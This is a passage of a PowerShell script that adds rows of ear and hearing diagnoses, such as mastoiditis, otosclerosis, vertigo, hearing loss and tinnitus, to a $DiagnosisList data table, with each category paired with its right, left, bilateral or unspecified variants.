$DiagnosisList.Rows.Add("Other mastoiditis and related conditions","Other mastoiditis and related conditions, left ear") + $null = $DiagnosisList.Rows.Add("Other mastoiditis and related conditions","Other mastoiditis and related conditions, bilateral") + $null = $DiagnosisList.Rows.Add("Other mastoiditis and related conditions","Other mastoiditis and related conditions, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified mastoiditis","Unspecified mastoiditis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified mastoiditis","Unspecified mastoiditis, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified mastoiditis","Unspecified mastoiditis, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified mastoiditis","Unspecified mastoiditis, bilateral") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of attic","Cholesteatoma of attic, unspecified ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of attic","Cholesteatoma of attic, right ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of attic","Cholesteatoma of attic, left ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of attic","Cholesteatoma of attic, bilateral") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of tympanum","Cholesteatoma of tympanum, unspecified ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of tympanum","Cholesteatoma of tympanum, right ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of tympanum","Cholesteatoma of tympanum, left ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of tympanum","Cholesteatoma of tympanum, bilateral") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of mastoid","Cholesteatoma of mastoid, unspecified ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of mastoid","Cholesteatoma of mastoid, right ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of mastoid","Cholesteatoma of mastoid, left ear") + $null = $DiagnosisList.Rows.Add("Cholesteatoma of mastoid","Cholesteatoma of mastoid, bilateral") + $null = $DiagnosisList.Rows.Add("Diffuse cholesteatosis","Diffuse cholesteatosis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Diffuse cholesteatosis","Diffuse cholesteatosis, right ear") + $null = $DiagnosisList.Rows.Add("Diffuse cholesteatosis","Diffuse cholesteatosis, left ear") + $null = $DiagnosisList.Rows.Add("Diffuse cholesteatosis","Diffuse cholesteatosis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified cholesteatoma","Unspecified cholesteatoma, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified cholesteatoma","Unspecified cholesteatoma, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified cholesteatoma","Unspecified cholesteatoma, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified cholesteatoma","Unspecified cholesteatoma, bilateral") + $null = $DiagnosisList.Rows.Add("Central perforation of tympanic membrane","Central perforation of tympanic membrane, unspecified ear") + $null = $DiagnosisList.Rows.Add("Central perforation of tympanic membrane","Central perforation of tympanic membrane, right ear") + $null = $DiagnosisList.Rows.Add("Central perforation of tympanic membrane","Central perforation of tympanic membrane, left ear") + $null = $DiagnosisList.Rows.Add("Central perforation of tympanic membrane","Central perforation of tympanic membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Attic perforation of tympanic membrane","Attic perforation of tympanic membrane, unspecified ear") + $null = $DiagnosisList.Rows.Add("Attic perforation of tympanic membrane","Attic perforation of tympanic membrane, right ear") + $null = $DiagnosisList.Rows.Add("Attic perforation of tympanic membrane","Attic perforation of tympanic membrane, left ear") + $null = $DiagnosisList.Rows.Add("Attic perforation of tympanic membrane","Attic perforation of tympanic membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Other marginal perforations of tympanic membrane","Other marginal perforations of tympanic membrane, right ear") + $null = $DiagnosisList.Rows.Add("Other marginal perforations of tympanic membrane","Other marginal perforations of tympanic membrane, left ear") + $null = $DiagnosisList.Rows.Add("Other marginal perforations of tympanic membrane","Other marginal perforations of tympanic membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Other marginal perforations of tympanic membrane","Other marginal perforations of tympanic membrane, unspecified ear") + $null = $DiagnosisList.Rows.Add("Multiple perforations of tympanic membrane","Multiple perforations of tympanic membrane, right ear") + $null = $DiagnosisList.Rows.Add("Multiple perforations of tympanic membrane","Multiple perforations of tympanic membrane, left ear") + $null = $DiagnosisList.Rows.Add("Multiple perforations of tympanic membrane","Multiple perforations of tympanic membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Multiple perforations of tympanic membrane","Multiple perforations of tympanic membrane, unspecified ear") + $null = $DiagnosisList.Rows.Add("Total perforations of tympanic membrane","Total perforations of tympanic membrane, right ear") + $null = $DiagnosisList.Rows.Add("Total perforations of tympanic membrane","Total perforations of tympanic membrane, left ear") + $null = $DiagnosisList.Rows.Add("Total perforations of tympanic membrane","Total perforations of tympanic membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Total perforations of tympanic membrane","Total perforations of tympanic membrane, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified perforation of tympanic membrane","Unspecified perforation of tympanic membrane, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified perforation of tympanic membrane","Unspecified perforation of tympanic membrane, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified perforation of tympanic membrane","Unspecified perforation of tympanic membrane, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified perforation of tympanic membrane","Unspecified perforation of tympanic membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified acute myringitis","Acute myringitis, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified acute myringitis","Acute myringitis, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified acute myringitis","Acute myringitis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified acute myringitis","Acute myringitis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Bullous myringitis","Bullous myringitis, right ear") + $null = $DiagnosisList.Rows.Add("Bullous myringitis","Bullous myringitis, left ear") + $null = $DiagnosisList.Rows.Add("Bullous myringitis","Bullous myringitis, bilateral") + $null = $DiagnosisList.Rows.Add("Bullous myringitis","Bullous myringitis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other acute myringitis","Other acute myringitis, right ear") + $null = $DiagnosisList.Rows.Add("Other acute myringitis","Other acute myringitis, left ear") + $null = $DiagnosisList.Rows.Add("Other acute myringitis","Other acute myringitis, bilateral") + $null = $DiagnosisList.Rows.Add("Other acute myringitis","Other acute myringitis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic myringitis","Chronic myringitis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Chronic myringitis","Chronic myringitis, right ear") + $null = $DiagnosisList.Rows.Add("Chronic myringitis","Chronic myringitis, left ear") + $null = $DiagnosisList.Rows.Add("Chronic myringitis","Chronic myringitis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified myringitis","Unspecified myringitis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified myringitis","Unspecified myringitis, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified myringitis","Unspecified myringitis, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified myringitis","Unspecified myringitis, bilateral") + $null = $DiagnosisList.Rows.Add("Atrophic flaccid tympanic membrane","Atrophic flaccid tympanic membrane, right ear") + $null = $DiagnosisList.Rows.Add("Atrophic flaccid tympanic membrane","Atrophic flaccid tympanic membrane, left ear") + $null = $DiagnosisList.Rows.Add("Atrophic flaccid tympanic membrane","Atrophic flaccid tympanic membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Atrophic flaccid tympanic membrane","Atrophic flaccid tympanic membrane, unspecified ear") + $null = $DiagnosisList.Rows.Add("Atrophic nonflaccid tympanic membrane","Atrophic nonflaccid tympanic membrane, right ear") + $null = $DiagnosisList.Rows.Add("Atrophic nonflaccid tympanic membrane","Atrophic nonflaccid tympanic membrane, left ear") + $null = $DiagnosisList.Rows.Add("Atrophic nonflaccid tympanic membrane","Atrophic nonflaccid tympanic membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Atrophic nonflaccid tympanic membrane","Atrophic nonflaccid tympanic membrane, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of tympanic membrane","Other specified disorders of tympanic membrane, right ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of tympanic membrane","Other specified disorders of tympanic membrane, left ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of tympanic membrane","Other specified disorders of tympanic membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified disorders of tympanic membrane","Other specified disorders of tympanic membrane, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of tympanic membrane","Unspecified disorder of tympanic membrane, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of tympanic membrane","Unspecified disorder of tympanic membrane, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of tympanic membrane","Unspecified disorder of tympanic membrane, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of tympanic membrane","Unspecified disorder of tympanic membrane, bilateral") + $null = $DiagnosisList.Rows.Add("Tympanosclerosis","Tympanosclerosis, right ear") + $null = $DiagnosisList.Rows.Add("Tympanosclerosis","Tympanosclerosis, left ear") + $null = $DiagnosisList.Rows.Add("Tympanosclerosis","Tympanosclerosis, bilateral") + $null = $DiagnosisList.Rows.Add("Tympanosclerosis","Tympanosclerosis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Adhesive middle ear disease","Adhesive right middle ear disease") + $null = $DiagnosisList.Rows.Add("Adhesive middle ear disease","Adhesive left middle ear disease") + $null = $DiagnosisList.Rows.Add("Adhesive middle ear disease","Adhesive middle ear disease, bilateral") + $null = $DiagnosisList.Rows.Add("Adhesive middle ear disease","Adhesive middle ear disease, unspecified ear") + $null = $DiagnosisList.Rows.Add("Discontinuity and dislocation of ear ossicles","Discontinuity and dislocation of ear ossicles, unspecified ear") + $null = $DiagnosisList.Rows.Add("Discontinuity and dislocation of ear ossicles","Discontinuity and dislocation of right ear ossicles") + $null = $DiagnosisList.Rows.Add("Discontinuity and dislocation of ear ossicles","Discontinuity and dislocation of left ear ossicles") + $null = $DiagnosisList.Rows.Add("Discontinuity and dislocation of ear ossicles","Discontinuity and dislocation of ear ossicles, bilateral") + $null = $DiagnosisList.Rows.Add("Ankylosis of ear ossicles","Ankylosis of ear ossicles, right ear") + $null = $DiagnosisList.Rows.Add("Ankylosis of ear ossicles","Ankylosis of ear ossicles, left ear") + $null = $DiagnosisList.Rows.Add("Ankylosis of ear ossicles","Ankylosis of ear ossicles, bilateral") + $null = $DiagnosisList.Rows.Add("Ankylosis of ear ossicles","Ankylosis of ear ossicles, unspecified ear") + $null = $DiagnosisList.Rows.Add("Partial loss of ear ossicles","Partial loss of ear ossicles, right ear") + $null = $DiagnosisList.Rows.Add("Partial loss of ear ossicles","Partial loss of ear ossicles, left ear") + $null = $DiagnosisList.Rows.Add("Partial loss of ear ossicles","Partial loss of ear ossicles, bilateral") + $null = $DiagnosisList.Rows.Add("Partial loss of ear ossicles","Partial loss of ear ossicles, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other acquired abnormalities of ear ossicles","Other acquired abnormalities of right ear ossicles") + $null = $DiagnosisList.Rows.Add("Other acquired abnormalities of ear ossicles","Other acquired abnormalities of left ear ossicles") + $null = $DiagnosisList.Rows.Add("Other acquired abnormalities of ear ossicles","Other acquired abnormalities of ear ossicles, bilateral") + $null = $DiagnosisList.Rows.Add("Other acquired abnormalities of ear ossicles","Other acquired abnormalities of ear ossicles, unspecified ear") + $null = $DiagnosisList.Rows.Add("Polyp of middle ear","Polyp of middle ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Polyp of middle ear","Polyp of right middle ear") + $null = $DiagnosisList.Rows.Add("Polyp of middle ear","Polyp of left middle ear") + $null = $DiagnosisList.Rows.Add("Polyp of middle ear","Polyp of middle ear, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified disorders of middle ear and mastoid","Other specified disorders of right middle ear and mastoid") + $null = $DiagnosisList.Rows.Add("Other specified disorders of middle ear and mastoid","Other specified disorders of left middle ear and mastoid") + $null = $DiagnosisList.Rows.Add("Other specified disorders of middle ear and mastoid","Other specified disorders of middle ear and mastoid, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified disorders of middle ear and mastoid","Other specified disorders of middle ear and mastoid, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of middle ear and mastoid","Unspecified disorder of middle ear and mastoid, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of middle ear and mastoid","Unspecified disorder of right middle ear and mastoid") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of middle ear and mastoid","Unspecified disorder of left middle ear and mastoid") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of middle ear and mastoid","Unspecified disorder of middle ear and mastoid, bilateral") + $null = $DiagnosisList.Rows.Add("Mastoiditis in infectious and parasitic diseases classified elsewhere","Mastoiditis in infectious and parasitic diseases classified elsewhere, unspecified ear") + $null = $DiagnosisList.Rows.Add("Mastoiditis in infectious and parasitic diseases classified elsewhere","Mastoiditis in infectious and parasitic diseases classified elsewhere, right ear") + $null = $DiagnosisList.Rows.Add("Mastoiditis in infectious and parasitic diseases classified elsewhere","Mastoiditis in infectious and parasitic diseases classified elsewhere, left ear") + $null = $DiagnosisList.Rows.Add("Mastoiditis in infectious and parasitic diseases classified elsewhere","Mastoiditis in infectious and parasitic diseases classified elsewhere, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified disorders of middle ear and mastoid in diseases classified elsewhere","Other specified disorders of middle ear and mastoid in diseases classified elsewhere, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other specified disorders of middle ear and mastoid in diseases classified elsewhere","Other specified disorders of right middle ear and mastoid in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other specified disorders of middle ear and mastoid in diseases classified elsewhere","Other specified disorders of left middle ear and mastoid in diseases classified elsewhere") + $null = $DiagnosisList.Rows.Add("Other specified disorders of middle ear and mastoid in diseases classified elsewhere","Other specified disorders of middle ear and mastoid in diseases classified elsewhere, bilateral") + $null = $DiagnosisList.Rows.Add("Otosclerosis involving oval window, nonobliterative","Otosclerosis involving oval window, nonobliterative, unspecified ear") + $null = $DiagnosisList.Rows.Add("Otosclerosis involving oval window, nonobliterative","Otosclerosis involving oval window, nonobliterative, right ear") + $null = $DiagnosisList.Rows.Add("Otosclerosis involving oval window, nonobliterative","Otosclerosis involving oval window, nonobliterative, left ear") + $null = $DiagnosisList.Rows.Add("Otosclerosis involving oval window, nonobliterative","Otosclerosis involving oval window, nonobliterative, bilateral") + $null = $DiagnosisList.Rows.Add("Otosclerosis involving oval window, obliterative","Otosclerosis involving oval window, obliterative, unspecified ear") + $null = $DiagnosisList.Rows.Add("Otosclerosis involving oval window, obliterative","Otosclerosis involving oval window, obliterative, right ear") + $null = $DiagnosisList.Rows.Add("Otosclerosis involving oval window, obliterative","Otosclerosis involving oval window, obliterative, left ear") + $null = $DiagnosisList.Rows.Add("Otosclerosis involving oval window, obliterative","Otosclerosis involving oval window, obliterative, bilateral") + $null = $DiagnosisList.Rows.Add("Cochlear otosclerosis","Cochlear otosclerosis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Cochlear otosclerosis","Cochlear otosclerosis, right ear") + $null = $DiagnosisList.Rows.Add("Cochlear otosclerosis","Cochlear otosclerosis, left ear") + $null = $DiagnosisList.Rows.Add("Cochlear otosclerosis","Cochlear otosclerosis, bilateral") + $null = $DiagnosisList.Rows.Add("Other otosclerosis","Other otosclerosis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other otosclerosis","Other otosclerosis, right ear") + $null = $DiagnosisList.Rows.Add("Other otosclerosis","Other otosclerosis, left ear") + $null = $DiagnosisList.Rows.Add("Other otosclerosis","Other otosclerosis, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified otosclerosis","Unspecified otosclerosis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified otosclerosis","Unspecified otosclerosis, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified otosclerosis","Unspecified otosclerosis, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified otosclerosis","Unspecified otosclerosis, bilateral") + $null = $DiagnosisList.Rows.Add("Meniere's disease","Meniere's disease, right ear") + $null = $DiagnosisList.Rows.Add("Meniere's disease","Meniere's disease, left ear") + $null = $DiagnosisList.Rows.Add("Meniere's disease","Meniere's disease, bilateral") + $null = $DiagnosisList.Rows.Add("Meniere's disease","Meniere's disease, unspecified ear") + $null = $DiagnosisList.Rows.Add("Benign paroxysmal vertigo","Benign paroxysmal vertigo, unspecified ear") + $null = $DiagnosisList.Rows.Add("Benign paroxysmal vertigo","Benign paroxysmal vertigo, right ear") + $null = $DiagnosisList.Rows.Add("Benign paroxysmal vertigo","Benign paroxysmal vertigo, left ear") + $null = $DiagnosisList.Rows.Add("Benign paroxysmal vertigo","Benign paroxysmal vertigo, bilateral") + $null = $DiagnosisList.Rows.Add("Vestibular neuronitis","Vestibular neuronitis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Vestibular neuronitis","Vestibular neuronitis, right ear") + $null = $DiagnosisList.Rows.Add("Vestibular neuronitis","Vestibular neuronitis, left ear") + $null = $DiagnosisList.Rows.Add("Vestibular neuronitis","Vestibular neuronitis, bilateral") + $null = $DiagnosisList.Rows.Add("Aural vertigo","Aural vertigo, right ear") + $null = $DiagnosisList.Rows.Add("Aural vertigo","Aural vertigo, left ear") + $null = $DiagnosisList.Rows.Add("Aural vertigo","Aural vertigo, bilateral") + $null = $DiagnosisList.Rows.Add("Aural vertigo","Aural vertigo, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other peripheral vertigo","Other peripheral vertigo, right ear") + $null = $DiagnosisList.Rows.Add("Other peripheral vertigo","Other peripheral vertigo, left ear") + $null = $DiagnosisList.Rows.Add("Other peripheral vertigo","Other peripheral vertigo, bilateral") + $null = $DiagnosisList.Rows.Add("Other peripheral vertigo","Other peripheral vertigo, unspecified ear") + $null = $DiagnosisList.Rows.Add("Vertigo of central origin","Vertigo of central origin, right ear") + $null = $DiagnosisList.Rows.Add("Vertigo of central origin","Vertigo of central origin, left ear") + $null = $DiagnosisList.Rows.Add("Vertigo of central origin","Vertigo of central origin, bilateral") + $null = $DiagnosisList.Rows.Add("Vertigo of central origin","Vertigo of central origin, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other disorders of vestibular function","Other disorders of vestibular function, right ear") + $null = $DiagnosisList.Rows.Add("Other disorders of vestibular function","Other disorders of vestibular function, left ear") + $null = $DiagnosisList.Rows.Add("Other disorders of vestibular function","Other disorders of vestibular function, bilateral") + $null = $DiagnosisList.Rows.Add("Other disorders of vestibular function","Other disorders of vestibular function, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of vestibular function","Unspecified disorder of vestibular function, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of vestibular function","Unspecified disorder of vestibular function, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of vestibular function","Unspecified disorder of vestibular function, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified disorder of vestibular function","Unspecified disorder of vestibular function, bilateral") + $null = $DiagnosisList.Rows.Add("Vertiginous syndromes in diseases classified elsewhere","Vertiginous syndromes in diseases classified elsewhere, right ear") + $null = $DiagnosisList.Rows.Add("Vertiginous syndromes in diseases classified elsewhere","Vertiginous syndromes in diseases classified elsewhere, left ear") + $null = $DiagnosisList.Rows.Add("Vertiginous syndromes in diseases classified elsewhere","Vertiginous syndromes in diseases classified elsewhere, bilateral") + $null = $DiagnosisList.Rows.Add("Vertiginous syndromes in diseases classified elsewhere","Vertiginous syndromes in diseases classified elsewhere, unspecified ear") + $null = $DiagnosisList.Rows.Add("Labyrinthitis","Labyrinthitis, right ear") + $null = $DiagnosisList.Rows.Add("Labyrinthitis","Labyrinthitis, left ear") + $null = $DiagnosisList.Rows.Add("Labyrinthitis","Labyrinthitis, bilateral") + $null = $DiagnosisList.Rows.Add("Labyrinthitis","Labyrinthitis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Labyrinthine fistula","Labyrinthine fistula, right ear") + $null = $DiagnosisList.Rows.Add("Labyrinthine fistula","Labyrinthine fistula, left ear") + $null = $DiagnosisList.Rows.Add("Labyrinthine fistula","Labyrinthine fistula, bilateral") + $null = $DiagnosisList.Rows.Add("Labyrinthine fistula","Labyrinthine fistula, unspecified ear") + $null = $DiagnosisList.Rows.Add("Labyrinthine dysfunction","Labyrinthine dysfunction, right ear") + $null = $DiagnosisList.Rows.Add("Labyrinthine dysfunction","Labyrinthine dysfunction, left ear") + $null = $DiagnosisList.Rows.Add("Labyrinthine dysfunction","Labyrinthine dysfunction, bilateral") + $null = $DiagnosisList.Rows.Add("Labyrinthine dysfunction","Labyrinthine dysfunction, unspecified ear") + $null = $DiagnosisList.Rows.Add("Noise effects on inner ear","Noise effects on right inner ear") + $null = $DiagnosisList.Rows.Add("Noise effects on inner ear","Noise effects on left inner ear") + $null = $DiagnosisList.Rows.Add("Noise effects on inner ear","Noise effects on inner ear, bilateral") + $null = $DiagnosisList.Rows.Add("Noise effects on inner ear","Noise effects on inner ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Other specified diseases of inner ear","Other specified diseases of right inner ear") + $null = $DiagnosisList.Rows.Add("Other specified diseases of inner ear","Other specified diseases of left inner ear") + $null = $DiagnosisList.Rows.Add("Other specified diseases of inner ear","Other specified diseases of inner ear, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified diseases of inner ear","Other specified diseases of inner ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified disease of inner ear","Unspecified disease of inner ear, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified disease of inner ear","Unspecified disease of right inner ear") + $null = $DiagnosisList.Rows.Add("Unspecified disease of inner ear","Unspecified disease of left inner ear") + $null = $DiagnosisList.Rows.Add("Unspecified disease of inner ear","Unspecified disease of inner ear, bilateral") + $null = $DiagnosisList.Rows.Add("Conductive and sensorineural hearing loss","Conductive hearing loss, bilateral") + $null = $DiagnosisList.Rows.Add("Conductive hearing loss, unilateral with unrestricted hearing on the contralateral side","Conductive hearing loss, unilateral, right ear, with unrestricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Conductive hearing loss, unilateral with unrestricted hearing on the contralateral side","Conductive hearing loss, unilateral, left ear, with unrestricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Conductive hearing loss, unspecified","Conductive hearing loss, unspecified") + $null = $DiagnosisList.Rows.Add("Sensorineural hearing loss, bilateral","Sensorineural hearing loss, bilateral") + $null = $DiagnosisList.Rows.Add("Sensorineural hearing loss, unilateral with unrestricted hearing on the contralateral side","Sensorineural hearing loss, unilateral, right ear, with unrestricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Sensorineural hearing loss, unilateral with unrestricted hearing on the contralateral side","Sensorineural hearing loss, unilateral, left ear, with unrestricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Unspecified sensorineural hearing loss","Unspecified sensorineural hearing loss") + $null = $DiagnosisList.Rows.Add("Mixed conductive and sensorineural hearing loss, bilateral","Mixed conductive and sensorineural hearing loss, bilateral") + $null = $DiagnosisList.Rows.Add("Mixed conductive and sensorineural hearing loss, unilateral with unrestricted hearing on the contralateral side","Mixed conductive and sensorineural hearing loss, unilateral, right ear, with unrestricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Mixed conductive and sensorineural hearing loss, unilateral with unrestricted hearing on the contralateral side","Mixed conductive and sensorineural hearing loss, unilateral, left ear, with unrestricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Mixed conductive and sensorineural hearing loss, unspecified","Mixed conductive and sensorineural hearing loss, unspecified") + $null = $DiagnosisList.Rows.Add("Conductive hearing loss, unilateral, with restricted hearing on the contralateral side","Conductive hearing loss, unilateral, right ear with restricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Conductive hearing loss, unilateral, with restricted hearing on the contralateral side","Conductive hearing loss, unilateral, left ear with restricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Sensorineural hearing loss, unilateral, with restricted hearing on the contralateral side","Sensorineural hearing loss, unilateral, right ear, with restricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Sensorineural hearing loss, unilateral, with restricted hearing on the contralateral side","Sensorineural hearing loss, unilateral, left ear, with restricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Mixed conductive and sensorineural hearing loss, unilateral with restricted hearing on the contralateral side","Mixed conductive and sensorineural hearing loss, unilateral, right ear with restricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Mixed conductive and sensorineural hearing loss, unilateral with restricted hearing on the contralateral side","Mixed conductive and sensorineural hearing loss, unilateral, left ear with restricted hearing on the contralateral side") + $null = $DiagnosisList.Rows.Add("Ototoxic hearing loss","Ototoxic hearing loss, right ear") + $null = $DiagnosisList.Rows.Add("Ototoxic hearing loss","Ototoxic hearing loss, left ear") + $null = $DiagnosisList.Rows.Add("Ototoxic hearing loss","Ototoxic hearing loss, bilateral") + $null = $DiagnosisList.Rows.Add("Ototoxic hearing loss","Ototoxic hearing loss, unspecified ear") + $null = $DiagnosisList.Rows.Add("Presbycusis","Presbycusis, unspecified ear") + $null = $DiagnosisList.Rows.Add("Presbycusis","Presbycusis, right ear") + $null = $DiagnosisList.Rows.Add("Presbycusis","Presbycusis, left ear") + $null = $DiagnosisList.Rows.Add("Presbycusis","Presbycusis, bilateral") + $null = $DiagnosisList.Rows.Add("Sudden idiopathic hearing loss","Sudden idiopathic hearing loss, unspecified ear") + $null = $DiagnosisList.Rows.Add("Sudden idiopathic hearing loss","Sudden idiopathic hearing loss, right ear") + $null = $DiagnosisList.Rows.Add("Sudden idiopathic hearing loss","Sudden idiopathic hearing loss, left ear") + $null = $DiagnosisList.Rows.Add("Sudden idiopathic hearing loss","Sudden idiopathic hearing loss, bilateral") + $null = $DiagnosisList.Rows.Add("Deaf nonspeaking, not elsewhere classified","Deaf nonspeaking, not elsewhere classified") + $null = $DiagnosisList.Rows.Add("Other specified hearing loss","Other specified hearing loss, right ear") + $null = $DiagnosisList.Rows.Add("Other specified hearing loss","Other specified hearing loss, left ear") + $null = $DiagnosisList.Rows.Add("Other specified hearing loss","Other specified hearing loss, bilateral") + $null = $DiagnosisList.Rows.Add("Other specified hearing loss","Other specified hearing loss, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified hearing loss","Unspecified hearing loss, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified hearing loss","Unspecified hearing loss, right ear") + $null = $DiagnosisList.Rows.Add("Unspecified hearing loss","Unspecified hearing loss, left ear") + $null = $DiagnosisList.Rows.Add("Unspecified hearing loss","Unspecified hearing loss, bilateral") + $null = $DiagnosisList.Rows.Add("Otalgia","Otalgia, right ear") + $null = $DiagnosisList.Rows.Add("Otalgia","Otalgia, left ear") + $null = $DiagnosisList.Rows.Add("Otalgia","Otalgia, bilateral") + $null = $DiagnosisList.Rows.Add("Otalgia","Otalgia, unspecified ear") + $null = $DiagnosisList.Rows.Add("Otorrhea","Otorrhea, unspecified ear") + $null = $DiagnosisList.Rows.Add("Otorrhea","Otorrhea, right ear") + $null = $DiagnosisList.Rows.Add("Otorrhea","Otorrhea, left ear") + $null = $DiagnosisList.Rows.Add("Otorrhea","Otorrhea, bilateral") + $null = $DiagnosisList.Rows.Add("Otorrhagia","Otorrhagia, unspecified ear") + $null = $DiagnosisList.Rows.Add("Otorrhagia","Otorrhagia, right ear") + $null = $DiagnosisList.Rows.Add("Otorrhagia","Otorrhagia, left ear") + $null = $DiagnosisList.Rows.Add("Otorrhagia","Otorrhagia, bilateral") + $null = $DiagnosisList.Rows.Add("Transient ischemic deafness","Transient ischemic deafness, right ear") + $null = $DiagnosisList.Rows.Add("Transient ischemic deafness","Transient ischemic deafness, left ear") + $null = $DiagnosisList.Rows.Add("Transient ischemic deafness","Transient ischemic deafness, bilateral") + $null = $DiagnosisList.Rows.Add("Transient ischemic deafness","Transient ischemic deafness, unspecified ear") + $null = $DiagnosisList.Rows.Add("Unspecified degenerative and vascular disorders of ear","Unspecified degenerative and vascular disorders of right ear") + $null = $DiagnosisList.Rows.Add("Unspecified degenerative and vascular disorders of ear","Unspecified degenerative and vascular disorders of left ear") + $null = $DiagnosisList.Rows.Add("Unspecified degenerative and vascular disorders of ear","Unspecified degenerative and vascular disorders of ear, bilateral") + $null = $DiagnosisList.Rows.Add("Unspecified degenerative and vascular disorders of ear","Unspecified degenerative and vascular disorders of unspecified ear") + $null = $DiagnosisList.Rows.Add("Tinnitus","Tinnitus, right ear") + $null = $DiagnosisList.Rows.Add("Tinnitus","Tinnitus, left ear") + $null = $DiagnosisList.Rows.Add("Tinnitus","Tinnitus, bilateral") + $null = $DiagnosisList.Rows.Add("Tinnitus","Tinnitus, unspecified ear") + $null = $DiagnosisList.Rows.Add("Pulsatile tinnitus","Pulsatile tinnitus, right ear") + $null = $DiagnosisList.Rows.Add("Pulsatile tinnitus","Pulsatile tinnitus, left ear") + $null = $DiagnosisList.Rows.Add("Pulsatile tinnitus","Pulsatile tinnitus, bilateral") + $null = $DiagnosisList.Rows.Add("Pulsatile tinnitus","Pulsatile tinnitus, unspecified ear") + $null = $DiagnosisList.Rows.Add("Auditory recruitment","Auditory recruitment, right ear") + $null = $DiagnosisList.Rows.Add("Auditory recruitment","Auditory recruitment, left ear") + $null = $DiagnosisList.Rows.Add("Auditory recruitment","Auditory recruitment, bilateral") + $null = $DiagnosisList.Rows.Add("Auditory recruitment","Auditory recruitment, unspecified 